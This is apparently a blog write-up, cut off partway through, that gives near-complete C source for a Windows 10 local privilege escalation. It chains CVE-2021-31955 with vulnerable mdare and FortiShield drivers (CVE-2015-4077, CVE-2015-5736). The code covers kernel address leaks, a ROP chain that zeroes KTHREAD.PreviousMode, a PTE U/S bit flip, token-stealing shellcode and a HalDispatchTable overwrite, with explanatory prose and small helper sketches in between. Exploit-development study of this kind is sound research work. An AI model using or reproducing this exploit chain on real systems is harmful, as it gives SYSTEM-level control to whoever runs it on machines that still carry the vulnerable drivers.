#pragma comment(lib, "ntdll_x64.lib")
#define EPROCESS_ThreadListHead_Offset 0x5e0
#define ETHREAD_ThreadListEntry_Offset 0x4e8
#define ETHREAD_Tcb_Offset             0x000
#define ETHREAD_Cid_Offset             0x478
#define CLIENTID_UniqueThread_Offset   0x8

extern "C" void TokenStealing();

typedef enum _SUPERFETCH_INFORMATION_CLASS
{
	SuperfetchRetrieveTrace = 0x1,
	SuperfetchSystemParameters = 0x2,
	SuperfetchLogEvent = 0x3,
	SuperfetchGenerateTrace = 0x4,
	SuperfetchPrefetch = 0x5,
	SuperfetchPfnQuery = 0x6,
	SuperfetchPfnSetPriority = 0x7,
	SuperfetchPrivSourceQuery = 0x8,
	SuperfetchSequenceNumberQuery = 0x9,
	SuperfetchScenarioPhase = 0xA,
	SuperfetchWorkerPriority = 0xB,
	SuperfetchScenarioQuery = 0xC,
	SuperfetchScenarioPrefetch = 0xD,
	SuperfetchRobustnessControl = 0xE,
	SuperfetchTimeControl = 0xF,
	SuperfetchMemoryListQuery = 0x10,
	SuperfetchMemoryRangesQuery = 0x11,
	SuperfetchTracingControl = 0x12,
	SuperfetchTrimWhileAgingControl = 0x13,
	SuperfetchInformationMax = 0x14,
} SUPERFETCH_INFORMATION_CLASS;
typedef NTSTATUS(WINAPI* _NtWriteVirtualMemory)(
	_In_ HANDLE ProcessHandle,
	_In_ PVOID BaseAddress,
	_In_ PVOID Buffer,
	_In_ ULONG NumberOfBytesToWrite,
	_Out_opt_ PULONG NumberOfBytesWritten
	);

typedef struct _SUPERFETCH_INFORMATION
{
	ULONG Version;
	ULONG Magic;
	SUPERFETCH_INFORMATION_CLASS InfoClass;
	PVOID Data;
	ULONG Length;
} SUPERFETCH_INFORMATION, * PSUPERFETCH_INFORMATION;

typedef enum _PFS_PRIVATE_PAGE_SOURCE_TYPE {
	PfsPrivateSourceKernel = 0x0,
	PfsPrivateSourceSession = 0x1,
	PfsPrivateSourceProcess = 0x2,
	PrfsPrivateSourceMax = 0x3,
} PFS_PRIVATE_PAGE_SOURCE_TYPE;

#pragma pack(push)
#pragma pack(4)

typedef struct _PFS_PRIVATE_PAGE_SOURCE
{
	PFS_PRIVATE_PAGE_SOURCE_TYPE Type;
	union {
		DWORD SessionId;
		DWORD ProcessId;
	};
	DWORD SpareDwords[2];
	ULONG ImagePathHash;
	ULONG UniqueProcessHash;
} PFS_PRIVATE_PAGE_SOURCE, * PPFS_PRIVATE_PAGE_SOURCE;

typedef struct _PF_PRIVSOURCE_INFO_V3 {
	PFS_PRIVATE_PAGE_SOURCE DbInfo;
	union {
		ULONG_PTR EProcess;
		ULONG_PTR GlobalVA;
	};
	ULONG WsPrivatePages;
	ULONG TotalPrivatePages;
	ULONG SessionID;
	CHAR ImageName[16];
	BYTE SpareBytes[12];
} PF_PRIVSOURCE_INFO_V3, * PPF_PRIVSOURCE_INFO_V3;

typedef struct _PF_PRIVSOURCE_INFO_V3PLUS {
	BYTE data2[8];
	DWORD ProcessId;
	BYTE data3[16];
	ULONG_PTR EProcess;
	BYTE data[60];
} PF_PRIVSOURCE_INFO_V3PLUS, * PPF_PRIVSOURCE_INFO_V3PLUS;

typedef struct _PF_PRIVSOURCE_QUERY_REQUEST {
	ULONG Version;

	union {
		__declspec(align(4)) struct {
			ULONG InfoCount;
			PF_PRIVSOURCE_INFO_V3 InfoArrayV3[1];
		} __sv3;
		__declspec(align(4)) struct {
			ULONG Type;
			ULONG InfoCount;
			PF_PRIVSOURCE_INFO_V3PLUS InfoArrayV3Plus[1];
		} __sv3plus;
	} __u0;
} PF_PRIVSOURCE_QUERY_REQUEST, * PPF_PRIVSOURCE_QUERY_REQUEST;

#pragma pack(pop)

typedef NTSTATUS(WINAPI* _NtQueryIntervalProfile)(
	DWORD junk,
	PULONG buffer
	);

This chunk defines the GetEprocessAddress() from freeide’s code for CVE-2021-31955 with my modifications mentioned earlier.

ULONGLONG GetEprocessAddress(const char* target)
{
	ULONG superfetch_info_size;
	PF_PRIVSOURCE_QUERY_REQUEST* pf_privsource_query_request;
	SUPERFETCH_INFORMATION superfetch_info = { 0 };
	BYTE temp_buffer[0x70];

	ZeroMemory(temp_buffer, sizeof(temp_buffer));

	PPEB peb = (PPEB)NtCurrentTeb()->ProcessEnvironmentBlock;
	DWORD dwBuildNumber = peb->OSBuildNumber;

	*(DWORD*)temp_buffer = 8; // Windows 10

	switch (dwBuildNumber)
	{
	case 7600:
	case 7601:
		*(DWORD*)temp_buffer = 3;
		break;
	case 9200:
		*(DWORD*)temp_buffer = 5;
		break;
	case 9600:
		*(DWORD*)temp_buffer = 6;
		break;
	}
	*(DWORD*)&temp_buffer[4] = 0;

	superfetch_info.InfoClass = SuperfetchPrivSourceQuery;
	superfetch_info.Version = 45;
	superfetch_info.Magic = 'kuhC';
	superfetch_info.Data = temp_buffer;
	superfetch_info.Length = sizeof(temp_buffer);

	NTSTATUS status;
	ULONG pf_privsource_query_request_version = *(DWORD*)temp_buffer;

	status = NtQuerySystemInformation(SystemSuperfetchInformation, &superfetch_info, sizeof(SUPERFETCH_INFORMATION), &superfetch_info_size);

	pf_privsource_query_request = (PF_PRIVSOURCE_QUERY_REQUEST*)LocalAlloc(LPTR, 2 * superfetch_info_size);

	pf_privsource_query_request->__u0.__sv3.InfoCount = 0;
	pf_privsource_query_request->Version = pf_privsource_query_request_version;
	superfetch_info.Data = pf_privsource_query_request;
	superfetch_info.Length = 2 * superfetch_info_size;

	status = NtQuerySystemInformation(SystemSuperfetchInformation, &superfetch_info, sizeof(SUPERFETCH_INFORMATION), &superfetch_info_size);

	auto sv3plus_request = &pf_privsource_query_request->__u0.__sv3plus;
	const char* targetName = target;
	const char* procName;

	ULONGLONG eprocess = 0;

	for (ULONG i = 0; i < sv3plus_request->InfoCount; ++i)
	{
		procName = (const char*)&sv3plus_request->InfoArrayV3Plus[i].data[0x14];

		if (strcmp(procName, targetName) == 0) {
			//printf("%15s\t%5d\t%p\n", procName, sv3plus_request->InfoArrayV3Plus[i].ProcessId, sv3plus_request->InfoArrayV3Plus[i].EProcess);
			eprocess = sv3plus_request->InfoArrayV3Plus[i].EProcess;
			break;
		}
	}

	// Free the buffer on every path, then return (0 means the target was not found).
	LocalFree(pf_privsource_query_request);
	return eprocess;
}

This chunk performs the address leak from CVE-2015-4077 via the leakQWORD() function. This function takes the address you want to read and the handle to the mdare driver. The chunk also includes the modified leakNtBase() function, which finds the base address of nt given the handle to the mdare driver and our KTHREAD address. It uses Morten Schenk’s method of reading the pointer at KTHREAD + 0x2a8, which contains the address of nt!EmpCheckErrataList, and then uses the modified scan back technique to locate the nt base address. The leakFortiBase() function is used to leak the base address of FortiShield. It walks the PsLoadedModuleList in nt and stops at the module whose name starts with FortiShi, which is our fortishield driver.

PULONGLONG leak_buffer = (PULONGLONG)VirtualAlloc((LPVOID)0x000000001a000000, 0x2000, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
ULONGLONG leakQWORD(ULONGLONG addr, HANDLE driver)
{
	memset((LPVOID)0x000000001a000000, 0x11, 0x1000);
	memset((LPVOID)0x000000001a001000, 0x22, 0x1000);
	leak_buffer[0] = 0x000000001a000008;
	leak_buffer[1] = 0x0000000000000003;
	leak_buffer[4] = 0x000000001a000028;
	leak_buffer[6] = addr - 0x70;

	DWORD IoControlCode = 0x22608C;
	LPVOID InputBuffer = (LPVOID)0x000000001a000000;
	DWORD InputBufferLength = 0x20;
	LPVOID OutputBuffer = (LPVOID)0x000000001a001000;
	DWORD OutputBufferLength = 0x110;
	DWORD lpBytesReturned;

	BOOL triggerIOCTL;
	triggerIOCTL = DeviceIoControl(driver, IoControlCode, InputBuffer, InputBufferLength, OutputBuffer, OutputBufferLength, &lpBytesReturned, NULL);
	if (!triggerIOCTL)
	{
		//printf("[!] Error in the SYSCALL: %d\n", GetLastError());
	}

	ULONGLONG result = leak_buffer[0x202];
	return result;
}

ULONGLONG leakNtBase(HANDLE driver, ULONGLONG kthread)
{

	ULONGLONG ntAddr = leakQWORD(kthread + 0x2a8, driver);
	ULONGLONG baseAddr;
	ULONGLONG signature = 0x00905a4d;
	ULONGLONG searchAddr = (ntAddr - 0x300000) & 0xFFFFFFFFFFFFF000;

	while (TRUE)
	{
		ULONGLONG readData = leakQWORD(searchAddr, driver);
		ULONGLONG tmp = readData & 0xFFFFFFFF;

		//printf("%llx\n", readData);
		//printf("%llx\n", tmp);


		if (tmp == signature)
		{
			baseAddr = searchAddr;
			break;
		}
		searchAddr = searchAddr - 0x1000;
	}
	return baseAddr;
}
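
The scan back in leakNtBase() can be tried out safely in user-mode. Below is a minimal sketch that runs the same page-by-page search over a local buffer instead of kernel memory. The names scan_back_for_mz() and read_dword() are my own stand-ins (read_dword() plays the role of leakQWORD()), and the max_pages limit is an addition that is not in the exploit code; it simply stops the loop instead of reading forever if the signature is never found.

```c
#include <stddef.h>
#include <stdint.h>

#define PAGE_SIZE    0x1000u
#define MZ_SIGNATURE 0x00905a4du            /* bytes 4D 5A 90 00 read as a little-endian DWORD */
#define NOT_FOUND    ((size_t)-1)

/* Hypothetical stand-in for leakQWORD(): reads a little-endian DWORD from a local buffer. */
uint32_t read_dword(const uint8_t *mem, size_t off)
{
    return (uint32_t)mem[off]
         | ((uint32_t)mem[off + 1] << 8)
         | ((uint32_t)mem[off + 2] << 16)
         | ((uint32_t)mem[off + 3] << 24);
}

/* Align start down to a page boundary, then step back one page at a time
 * until the MZ signature is found or max_pages pages have been checked. */
size_t scan_back_for_mz(const uint8_t *mem, size_t mem_len, size_t start, size_t max_pages)
{
    if (mem_len < sizeof(uint32_t) || start >= mem_len)
        return NOT_FOUND;

    size_t off = start & ~(size_t)(PAGE_SIZE - 1);
    for (size_t i = 0; i < max_pages; i++) {
        if (off + sizeof(uint32_t) <= mem_len && read_dword(mem, off) == MZ_SIGNATURE)
            return off;
        if (off < PAGE_SIZE)
            break;                          /* reached the start of the buffer */
        off -= PAGE_SIZE;
    }
    return NOT_FOUND;
}
```

In the exploit the equivalent of start is the leaked nt!EmpCheckErrataList pointer minus 0x300000, and every read goes through the mdare driver rather than a local buffer.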

ULONGLONG leakFortiBase(HANDLE driver, ULONGLONG ntBase)
{
	ULONGLONG PsLoadModuleListAddr = ntBase + 0xc2a310;
	ULONGLONG searchAddr = leakQWORD(PsLoadModuleListAddr, driver);
	ULONGLONG addr = 0;
	while (1)
	{
		ULONGLONG namePointer = leakQWORD(searchAddr + 0x60, driver);
		ULONGLONG name = leakQWORD(namePointer, driver);
		if (name == 0x00740072006f0046)
		{
			name = leakQWORD(namePointer + 8, driver);
			if (name == 0x0069006800530069)
			{
				addr = leakQWORD(searchAddr + 0x30, driver);
				break;
			}
		}
		searchAddr = leakQWORD(searchAddr, driver);
	}
	return addr;
}
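
The two magic constants in leakFortiBase() are just the first eight characters of the module name, read as two QWORDs of UTF-16LE text. A small sketch of how they can be derived is below; pack_utf16le4() is a hypothetical helper of mine and only handles plain ASCII characters.

```c
#include <stdint.h>

/* Pack four ASCII characters as UTF-16LE code units into one QWORD,
 * the way they appear when a wide string is read 8 bytes at a time.
 * The first character ends up in the lowest 16 bits. */
uint64_t pack_utf16le4(const char s[4])
{
    uint64_t q = 0;
    for (int i = 0; i < 4; i++)
        q |= (uint64_t)(uint8_t)s[i] << (16 * i);
    return q;
}
```

Packing "Fort" gives 0x00740072006f0046 and packing "iShi" gives 0x0069006800530069, which are the two values the loop compares against.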

This chunk allocates the fake stack for the stack pivot and builds the ROP chain. This chain was written by Morten Schenk and Sickness. The chain is similar to the one in the POC on exploit-db but is tailored to work with Windows 10 20H2. Later in the code, when we trigger the CVE-2015-5736 vulnerable IOCTL, we use the ROP gadget mov esp, 0xB60F0020 to pivot the stack to our ROP chain at the user-mode address we allocate in the allocate_fake_stack() function. We are able to use this gadget as the stack pivot because the value it moves into esp is also a valid user-mode address that we can allocate. That is why the function starts by allocating a user-mode region that contains that address.

The ROP chain sets the PreviousMode in our KTHREAD to 0 to enable us to use ReadProcessMemory and NtWriteVirtualMemory as read and write primitives. As a reminder, this works because a PreviousMode of zero tricks the kernel into thinking the parameters passed to ReadProcessMemory and NtWriteVirtualMemory came from a kernel-mode caller instead of a user-mode caller. This gives us the read/write primitives, because a call to ReadProcessMemory from a kernel-mode thread is allowed to read kernel-mode memory and a call to NtWriteVirtualMemory from a kernel-mode thread is allowed to write to kernel-mode memory.

The ROP chain also restores the stack and registers so that execution continues instead of crashing once the chain, which runs as our hijacked callback from the vulnerable CVE-2015-5736 IOCTL, has finished changing PreviousMode. This chunk also contains the get_pxe_address_64() function, which returns the address of the PTE for the supplied virtual address given the PTE base address we pull later in the code. This lets us locate the PTE for a virtual address and flip bits such as the U/S or NX bits.

PULONGLONG allocate_fake_stack(ULONGLONG ntBase, ULONGLONG fortishield_callback, ULONGLONG fortishield_restore, ULONGLONG kThread)
{
	PULONGLONG fake_stack = (PULONGLONG)VirtualAlloc((LPVOID)0x00000000B60E0000, 0x14000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	if (fake_stack == NULL)
	{
		printf("[!] Error while allocating the fake stack: %d\n", GetLastError());
		exit(1);
	}
	memset(fake_stack, 0x90, 0x14000);

	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x00))[0] = (ULONGLONG)ntBase + 0x3f01bf;		// pop rax ; pop rcx ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x08))[0] = (ULONGLONG)fortishield_callback;		// Callback address
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x10))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x18))[0] = (ULONGLONG)ntBase + 0x2dd014;		// mov qword [rax], rcx ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x20))[0] = (ULONGLONG)ntBase + 0x3f01bf;		// pop rax ; pop rcx ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x28))[0] = (ULONGLONG)kThread + 0x232;			// KTHREAD.PreviousMode
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x30))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x38))[0] = (ULONGLONG)ntBase + 0x49584f;		// mov byte [rax], cl ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x40))[0] = (ULONGLONG)ntBase + 0x2017d0;		// pop rbx ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x48))[0] = 0x00000000b60f0110;					// Location on fake_stack
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x50))[0] = (ULONGLONG)ntBase + 0x2017f2;		// pop rax ; ret;
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x58))[0] = (ULONGLONG)ntBase + 0x217527;		// mov rax, rcx ; add rsp, 0x28 ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x60))[0] = (ULONGLONG)ntBase + 0x3cd671;		// mov rcx, rsi ; call rax
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x68))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x70))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x78))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x80))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x88))[0] = (ULONGLONG)ntBase + 0x20de71;		// pop rcx ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x90))[0] = 0x0000000000000028;					// Value to subtract to get RSP
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x98))[0] = (ULONGLONG)ntBase + 0x029db2b;		// sub rax, rcx ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xa0))[0] = (ULONGLONG)ntBase + 0x20de71;		// pop rcx ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xa8))[0] = (ULONGLONG)fortishield_restore;		// Restore address
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xb0))[0] = (ULONGLONG)ntBase + 0x2dd014;		// mov qword [rax], rcx ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xb8))[0] = (ULONGLONG)ntBase + 0x2b82ce;		// mov qword [rbx], rax ; add rsp, 0x20 ; pop rbx ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xc0))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xc8))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xd0))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xd8))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xe0))[0] = 0x0000000000000000;					// Restore RBX
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xe8))[0] = (ULONGLONG)ntBase + 0x201380;		// pop rsp ; ret
	return fake_stack;
}
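
The + 0x10020 in every line of the chain is not arbitrary. It is the distance from the start of the allocation to the address the pivot gadget loads into esp. The sketch below checks that arithmetic; fake_stack_offset() is a hypothetical helper of mine, and the base and size are the values passed to VirtualAlloc above.

```c
#include <stdint.h>

#define FAKE_STACK_BASE 0xB60E0000u   /* address requested from VirtualAlloc */
#define FAKE_STACK_SIZE 0x14000u      /* size requested from VirtualAlloc */

/* Return the offset of va inside the fake stack allocation,
 * or -1 if va is outside of it. */
int64_t fake_stack_offset(uint32_t va)
{
    if (va < FAKE_STACK_BASE || va - FAKE_STACK_BASE >= FAKE_STACK_SIZE)
        return -1;
    return (int64_t)(va - FAKE_STACK_BASE);
}
```

The pivot value 0xB60F0020 maps to offset 0x10020, where the first gadget is written. The "Location on fake_stack" value 0xB60F0110 maps to 0x10110, just past the last chain entry at 0x10020 + 0xe8, and the 0xB60F0200 address used by the shellcode maps to the fake_stack + 0x10200 slot that main() fills in later.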

ULONGLONG get_pxe_address_64(ULONGLONG address, ULONGLONG pte_start)
{
	ULONGLONG result = address >> 9;
	result = result | pte_start;
	result = result & (pte_start + 0x0000007ffffffff8);
	return result;
}
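
The three lines in get_pxe_address_64() are compact, so here is a sketch of the same calculation written the long way next to the original for comparison. pte_address() is my own name for it. It assumes the PTE base is aligned to 512 GB (the low 39 bits are zero), which is what makes the two forms agree. The base used in the example, 0xFFFFF68000000000, is the old static PTE base from before randomization and is only there to have a concrete number to work with.

```c
#include <stdint.h>

/* Long form: (va >> 12) is the virtual page number and every PTE is 8 bytes,
 * so the PTE lives at base + vpn * 8. Shifting by 9 and masking off the low
 * 3 bits does both steps at once; the mask keeps the 36 VPN bits. */
uint64_t pte_address(uint64_t va, uint64_t pte_base)
{
    return pte_base + ((va >> 9) & 0x7ffffffff8ULL);
}

/* The function from the exploit, reproduced unchanged for comparison. */
uint64_t get_pxe_address_64(uint64_t address, uint64_t pte_start)
{
    uint64_t result = address >> 9;
    result = result | pte_start;
    result = result & (pte_start + 0x0000007ffffffff8ULL);
    return result;
}
```

With that example base, the shellcode page at 0x00000002a0000000 has its PTE at 0xFFFFF68001500000 and the fake stack page at 0xB60F0000 has its PTE at 0xFFFFF680005B0780. On a real 20H2 target the base is whatever value was leaked from nt!MiGetPteAddress+0x13.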

This is the walkEprocess() function I added. It walks the thread list of the EPROCESS leaked via CVE-2021-31955 and returns the KTHREAD of the current thread. It takes a handle to the mdare driver, which it uses to leak QWORDs at various addresses, and the EPROCESS address you wish to walk.

ULONGLONG walkEprocess(HANDLE driver, ULONGLONG eProcess) {
	DWORD currentTid = GetCurrentThreadId();

	ULONGLONG listHead = eProcess + EPROCESS_ThreadListHead_Offset;
	ULONGLONG flink = leakQWORD(listHead, driver);

	while (flink != listHead) {
		ULONGLONG ethread = flink - ETHREAD_ThreadListEntry_Offset;

		ULONGLONG uniqueTid = leakQWORD(ethread + ETHREAD_Cid_Offset + CLIENTID_UniqueThread_Offset, driver);

		if ((DWORD)uniqueTid == currentTid) {
			ULONGLONG kthread = ethread;  // Tcb is at offset 0x0
			printf("[+] Found current thread:\n");
			printf("[+] ETHREAD: 0x%llx\n", ethread);
			printf("[+] KTHREAD: 0x%llx\n", kthread);
			return kthread;
		}

		flink = leakQWORD(flink, driver);  // Move to next thread
	}

	printf("[-] Current thread not found in EPROCESS thread list.\n");
	return 0;	// no matching thread found; callers should treat 0 as a failure
}

The trigger_callback() function creates some files and then moves them which will trigger the callback we set with the CVE-2015-5736 IOCTL.

int trigger_callback()
{
	printf("[+] Creating dummy file\n");
	system("echo test > C:\\Users\\n00b\\AppData\\LocalLow\\test.txt");
	printf("[+] Creating dummy file 2\n");
	system("echo test > C:\\Users\\n00b\\AppData\\LocalLow\\test3.txt");
	printf("[+] Calling MoveFileEx()\n");

	BOOL MFEresult = MoveFileEx(L"C:\\Users\\n00b\\AppData\\LocalLow\\test.txt", L"C:\\Users\\n00b\\AppData\\LocalLow\\test2.txt", MOVEFILE_REPLACE_EXISTING);
	if (MFEresult == 0)
	{
		printf("[!] Error while calling MoveFileEx(): %d\n", GetLastError());
		return 1;
	}
	return 0;
}

This chunk is the start of the main() function. It begins with opening handles to the mdare and fortishield drivers.

int main()
{

	HANDLE mdare = CreateFile(L"\\\\.\\mdareDriver_48", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
	if (mdare == INVALID_HANDLE_VALUE)
	{
		printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
		return 1;
	}

	HANDLE forti = CreateFile(L"\\\\.\\FortiShield", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
	if (forti == INVALID_HANDLE_VALUE)
	{
		printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
		return 1;
	}

This chunk declares the eProcess variable, sets the name of the exploit executable whose EPROCESS we want, and passes it to GetEprocessAddress. It then pulls the KTHREAD with the walkEprocess() function and leaks the nt base address with leakNtBase(). It then stores the stack pivot gadget address in the ntPivot variable and finds the start of the PTE address range by leaking the value stored at nt!MiGetPteAddress+0x13. We need the PTE base address to find the PTE for our user-mode address so we can flip the U/S bit. The PTE base address has been randomized on boot since Windows 10 1607; previous versions used a static PTE base address, making it easier to find. Windows still needs to know the PTE base address, so after it is determined on boot it is stored at nt!MiGetPteAddress+0x13. We can see the PTE base address by running dqs or u on nt!MiGetPteAddress+0x13 in WinDbg. We then subtract the base address of nt from the address of nt!MiGetPteAddress+0x13 to get the offset to use with the read primitive to retrieve the stored PTE base address.

post2-windbg-migetpteaddress

The code chunk then leaks the base address of fortishield with the leakFortiBase() function and sets the fortishield_callback and fortishield_restore variables. These variables are used to hijack and restore execution in the vulnerable fortishield IOCTL.

	ULONGLONG eProcess;
	const char* forti_exploit = "kstack.exe";
	eProcess = GetEprocessAddress(forti_exploit);
	printf("[+] EPROCESS found 0x%llx\n", eProcess);
	ULONGLONG kThread = walkEprocess(mdare, eProcess);
	ULONGLONG ntBase = leakNtBase(mdare, kThread);
	printf("[+] ntoskrnl.exe base address is: 0x%llx\n", ntBase);
	ULONGLONG ntPivot = ntBase + 0x20bbc2; // mov esp, 0xB60F0020 ; ret // mov esp, 0xf6000000; retn;
	printf("[+] stack pivot gadget found: 0x%llx\n", ntPivot);
	ULONGLONG ntMiGetPteAddressOffset = leakQWORD(ntBase + 0x33273B, mdare);
	printf("[+] ntMiGetPteAddressOffset is: 0x%llx\n", ntMiGetPteAddressOffset);
	ULONGLONG fortishieldBase = leakFortiBase(mdare, ntBase);
	printf("[+] FortiShield.sys base address is: 0x%llx\n", fortishieldBase);
	ULONGLONG fortishield_callback = fortishieldBase + 0xd150;
	ULONGLONG fortishield_restore = fortishieldBase + 0x2f73;
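
Every hard coded value in this chunk (0x20bbc2, 0x33273B, 0xd150, 0x2f73) is an offset from a module base that was worked out once in the debugger and is then added to the base leaked at runtime. A tiny sketch of that round trip is below. rva_of() and rebase() are hypothetical helper names, and the addresses in the usage note are made up for illustration.

```c
#include <stdint.h>

/* Offset of a symbol from its module base, as computed once in WinDbg. */
uint64_t rva_of(uint64_t symbol_va, uint64_t module_base)
{
    return symbol_va - module_base;
}

/* Address of the same symbol on another boot, given the freshly leaked base. */
uint64_t rebase(uint64_t rva, uint64_t leaked_base)
{
    return leaked_base + rva;
}
```

For example, if nt were loaded at 0xfffff80261200000 and WinDbg showed nt!MiGetPteAddress+0x13 at 0xfffff8026153273b, rva_of() would give 0x33273b, and rebase() would turn that back into a usable address after the next reboot moves nt somewhere else. These offsets are specific to one build of the OS, which is why they break on a different version.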

This chunk then prints the PTE base virtual address, finds the PTE of the fake stack address with get_pxe_address_64(), and then allocates the fake stack and builds the ROP chain with allocate_fake_stack().

	printf("[+] PTE VA start address is: 0x%llx\n", ntMiGetPteAddressOffset);


	ULONGLONG pte_result = get_pxe_address_64(0xB60f0000, ntMiGetPteAddressOffset);
	printf("[+] PTE virtual address for 0x0B60F0100: %I64x\n", pte_result);
	PULONGLONG fake_stack = allocate_fake_stack(ntBase, fortishield_callback, fortishield_restore, kThread);

This chunk sets up the call to the vulnerable IOCTL for CVE-2015-5736, calls the IOCTL, and then triggers the callback with trigger_callback(). The getchar() calls allow for delaying the execution of code to help with troubleshooting and debugging. They can be commented out or removed.

	DWORD IoControlCode = 0x220028;
	ULONGLONG InputBuffer = ntPivot;
	DWORD InputBufferLength = 0x8;
	ULONGLONG OutputBuffer = 0x0;
	DWORD OutputBufferLength = 0x0;
	DWORD lpBytesReturned;

	getchar();

	BOOL triggerIOCTL = DeviceIoControl(forti, IoControlCode, (LPVOID)&InputBuffer, InputBufferLength, (LPVOID)&OutputBuffer, OutputBufferLength, &lpBytesReturned, NULL);
	getchar();
	trigger_callback();

This chunk sleeps to ensure that the callback has had enough time to finish, then allocates user-mode memory at 0x00000002a0000000 and uses get_pxe_address_64() to retrieve the virtual address of its PTE. It uses ReadProcessMemory to read the PTE value and print it to the screen. It then stores the shellcode in the user-mode memory we allocated and uses the NtWriteVirtualMemory write primitive to flip the U/S bit so the page appears to be a supervisor (kernel-mode) page.

	Sleep(2000);
	LPVOID read_qword = malloc(sizeof(ULONGLONG));
	SIZE_T read_bytes;
	memset(read_qword, 0x00, sizeof(ULONGLONG));

	PULONGLONG ppte_base = &ntMiGetPteAddressOffset;
	if (ppte_base == 0)
	{
		printf("[!] Error while reading from nt!MiGetPteAddress + 0x13\n");
		exit(1);
	}
	printf("[+] PTE base address: %llx \n", *ppte_base);

	ULONGLONG shellcode = 0x00000002a0000000;
	LPVOID allocation_sc = VirtualAlloc((LPVOID)shellcode, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	if (allocation_sc == NULL)
	{
		printf("[!] Error while allocating memory for the input buffer: %d\n", GetLastError());
		exit(1);
	}
	memset(allocation_sc, 0x90, 0x1000);

	memcpy((LPVOID)((ULONGLONG)allocation_sc + 0x08), &TokenStealing, 0xc0);
	((PDWORD64)((DWORD64)allocation_sc + 0x80))[0] = fortishield_callback;
	((PDWORD64)((DWORD64)allocation_sc + 0x88))[0] = fortishield_restore;

	ULONGLONG pte_base = (ULONGLONG)*ppte_base;
	ULONGLONG pte_va = get_pxe_address_64(0x00000002a0000000, pte_base);

	memset(read_qword, 0x00, sizeof(ULONGLONG));
	if (!ReadProcessMemory(GetCurrentProcess(), (LPVOID)pte_va, read_qword, sizeof(ULONGLONG), &read_bytes))
	{
		printf("[!] Error while calling ReadProcessMemory(): %d\n", GetLastError());
	}
	PULONGLONG ppte_entry = (PULONGLONG)((ULONG_PTR*)read_qword);
	printf("[+] PTE flags: %llx \n", *ppte_entry);
	//Flip U/S bit
	ULONGLONG write_what = (ULONGLONG)*ppte_entry ^ 1 << 2;
	_NtWriteVirtualMemory pNtWriteVirtualMemory = (_NtWriteVirtualMemory)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtWriteVirtualMemory");
	if (!pNtWriteVirtualMemory)
	{
		printf("[!] Error while resolving NtWriteVirtualMemory: %d\n", GetLastError());
		exit(1);
	}
	pNtWriteVirtualMemory(GetCurrentProcess(), (LPVOID)pte_va, &write_what, sizeof(ULONGLONG), NULL);
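
The XOR above toggles the U/S bit, so it only produces a supervisor page if the bit was set to begin with (it is for a fresh user-mode allocation). A minimal sketch of the difference between toggling and clearing is below. The helper names are mine, and the PTE value used in the usage note is made up for illustration.

```c
#include <stdint.h>

#define PTE_USER (1ULL << 2)   /* U/S bit: 1 = user, 0 = supervisor */

/* Clear the U/S bit. Safe to call more than once. */
uint64_t pte_make_supervisor(uint64_t pte)
{
    return pte & ~PTE_USER;
}

/* Toggle the U/S bit, which is what the XOR in the exploit does.
 * Calling it a second time flips the page back to user. */
uint64_t pte_toggle_user(uint64_t pte)
{
    return pte ^ PTE_USER;
}
```

For a PTE value of 0x12345867 both helpers return 0x12345863 on the first call. Running the toggle again returns 0x12345867, while the clear stays at 0x12345863, which matters if the exploit is re-run against a page it already modified.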

This chunk uses the read primitive to retrieve the value of HalDispatchTable+0x08 so that we can save the original value that points to HaliQuerySystemInformation. It then saves the address on the fake stack so that the shellcode can reference it when it restores execution following the token steal. It then uses the write primitive to overwrite HalDispatchTable+0x08 with the shellcode address and triggers the call to it with NtQueryIntervalProfile. The ULONG trash is just a ULONG variable declared so we can pass its pointer to NtQueryIntervalProfile; it serves no other purpose.

	ULONGLONG HaliQuerySystemInformation = (ULONGLONG)ntBase + 0xc00a68;
